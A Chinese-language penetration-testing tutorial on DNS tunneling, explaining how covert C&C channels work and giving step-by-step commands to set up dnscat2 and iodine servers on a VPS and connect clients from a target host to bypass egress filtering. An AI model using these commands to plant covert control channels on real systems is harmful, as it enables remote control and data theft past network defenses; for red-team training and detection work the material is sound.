在目标主机有打开ssh服务的情况下,可以连接ssh服务
DNS协议是域名解析协议,在域名和IP地址之间进行转换,该协议也是一种请求/应答协议,也是一种可用于应用层的隧道技术。DNS,ICMP,HTTP/HTTPS等难以禁用的协议已成为攻击者控制隧道的主流隧道
用于管理僵尸网络和进行APT攻击的服务器叫做C&C服务器(Command and Control Server,命令及控制服务器)。C&C节点分为两种,分别是C&C服务端(攻击者)和C&C客户端(被控制的计算机)。C&C通信是指植入C&C客户端的木马或后门程序与C&C服务端上的远程控制程序之间的通信。
DNS隧道工作的原理:在进行DNS查询时。如果查询的域名不在DNS服务器本机的缓存中,就会访问互联网进行查询,然后返回结果。如果在互联网上有一台定制的服务器,那么依靠DNS协议即可进行数据包的交换。从DNS协议的角度看,这样的操作只是在一次次地查询某个特定的域名并得到解析结果,但其本质问题是,预期的返回结果应该是一个IP地址,而事实上返回的可以是任意字符串,包括加密的C&C指令。
因为DNS在网络世界里不可或缺,所以基于可用性的考虑等,很难做到完全过滤DNS的流量。因此,攻击者可以利用它实现远程控制,文件传输等操作。
dnscat2 dnscat2隧道有两种模式,分别是直连模式和中继模式
直连模式:客户端直接指向IP地址的DNS服务器发起DNS解析请求
中继模式:DNS经过互联网的迭代解析,指向指定的DNS服务器。与直连模式相比,中继模式的速度较慢
一般情况下,我们使用dnscat2的中继模式要更加频繁,因为直连模式的隐蔽性要更差一些。
当网段只允许白名单流量出站,同时屏蔽其他端口,传统的C&C通信无法建立。在这样的情况下,可以使用DNS隐蔽隧道建立通信。
演示如何使用dnscat2的中继模式
需要一个vps(阿里云vps) 一个域名 确保其NS解析能够正常工作
vps作为服务端,安装dnscat2服务端
apt-get install gem
apt-get install ruby-dev
apt-get install libpq-dev
apt-get install ruby-bundler
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2
cd server
sudo gem install bundler
运行dnscat2服务端
sudo ruby ./dnscat2.rb vps.****.top -e open -c cookie --no-cache
注:-e规定安全级别。"open" 表示服务端允许客户端不进行加密,-no-cache 禁止缓存,-c 自定义的连接密码
在目标主机上安装客户端。
本次测试使用的是windows7,直接在官方网可以下到编译好的客户端。
测试客户端是否能与服务端通信
dnscat2-v0.07-client-win32.exe --ping vps.****.top
执行如下命令,连接服务端
dnscat2-v0.07-client-win32.exe --dns domain=vps.****.top --secret cookie
iodine可以通过一台DNS服务器制造一个IPV4数据通道,适合在目标主机只能发送DNS请求的网络中使用。其原理:通过TAP虚拟网卡,在服务端建立一个局域网;在客户端,通过TAP建立一个虚拟网卡;两者通过DNS隧道连接,处于同一个局域网(可以通过ping命令通信)。在客户端和服务端之间建立联系后,客户机上会多出一块名为'dns0'的网卡。
linux上直接apt-get install iodine完成安装
设置域名
安装后使用如下命令,服务端运行idine
iodined -f -c -P cookie 10.1.1.1 vps.c0okb.top --DD
安装客户端,下载地址:https://code.kryo.se/iodine/,运行如下命令
iodine -fP cookie vps.****.top